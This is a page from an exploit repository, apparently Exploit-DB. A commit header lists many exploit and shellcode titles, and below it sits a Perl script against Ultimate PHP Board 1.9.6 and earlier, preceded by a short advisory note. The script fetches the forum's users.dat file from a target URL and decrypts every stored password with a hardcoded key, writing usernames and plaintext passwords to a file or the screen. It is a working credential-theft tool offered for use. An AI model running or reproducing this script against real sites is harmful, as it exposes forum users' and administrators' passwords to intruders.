880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
76 lines
No EOL
2.6 KiB
Perl
Executable file
76 lines
No EOL
2.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/13975/info
|
|
|
|
Ultimate PHP Board is prone to a weak password encryption vulnerability. This issue is due to a failure of the application to protect passwords with a sufficiently effective encryption scheme.
|
|
|
|
This issue may allow a malicious user to gain access to user and administrator passwords for the affected application.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# Passwords Decrypter for UPB <= 1.9.6
|
|
# Related advisory:
|
|
http://www.securityfocus.com/archive/1/402461/30/0/threaded
|
|
# Discovered and Coded by Alberto Trivero
|
|
|
|
use Getopt::Std;
|
|
use LWP::Simple;
|
|
getopt('hfu');
|
|
|
|
print "\n\t========================================\n";
|
|
print "\t= Passwords Decrypter for UPB <= 1.9.6 =\n";
|
|
print "\t= by Alberto Trivero =\n";
|
|
print "\t========================================\n\n";
|
|
|
|
if(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {
|
|
print "Usage:\nperl $0 -h [full_target_path] [-f [output_file_name] OR -u
|
|
[username]]\n\n";
|
|
print "Examples:\nperl $0 -h http://www.example.com/upb/ -f
|
|
results.txt\n";
|
|
print "perl $0 -h http://www.example.com/upb/ -u Alby\n";
|
|
exit(0);
|
|
}
|
|
|
|
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrh
|
|
mbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzv
|
|
qnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
|
|
$page=get($opt_h."db/users.dat") || die "[-] Unable to retrieve: $!";
|
|
print "[+] Connected to: $opt_h\n";
|
|
@page=split(/\n/,$page);
|
|
|
|
if($opt_f) {
|
|
open(RESULTS,"+>$opt_f") || die "[-] Unable to open $opt_f: $!";
|
|
print RESULTS "Results for $opt_h\n","="x40,"\n\n";
|
|
for($in=0;$in<@page;$in++) {
|
|
$page[$in]=~m/^(.*?)<~>/ && print RESULTS "Username: $1\n";
|
|
$page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS "Crypted Password:
|
|
$1\n";
|
|
&decrypt;
|
|
print RESULTS "Decrypted Password: $crypt\n\n";
|
|
$crypt="";
|
|
}
|
|
close(RESULTS);
|
|
print "[+] Results printed correct in: $opt_f\n";
|
|
}
|
|
|
|
if($opt_u) {
|
|
for($in=0;$in<@page;$in++) {
|
|
if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {
|
|
print "[+] Username: $opt_u\n";
|
|
print "[+] Crypted Password: $1\n";
|
|
&decrypt;
|
|
print "[+] Decrypted Password: $crypt\n";
|
|
exit(0);
|
|
}
|
|
}
|
|
print "[-] Username '$opt_u' doesn't exist\n";
|
|
}
|
|
|
|
sub decrypt {
|
|
for($i=0;$i<length($1);$i++) {
|
|
$i_key=ord(substr($key, $i, 1));
|
|
$i_text=ord(substr($1, $i, 1));
|
|
$n_key=ord(substr($key, $i+1, 1));
|
|
$i_crypt=$i_text + $n_key;
|
|
$i_crypt-=$i_key;
|
|
$crypt.=chr($i_crypt);
|
|
}
|
|
} |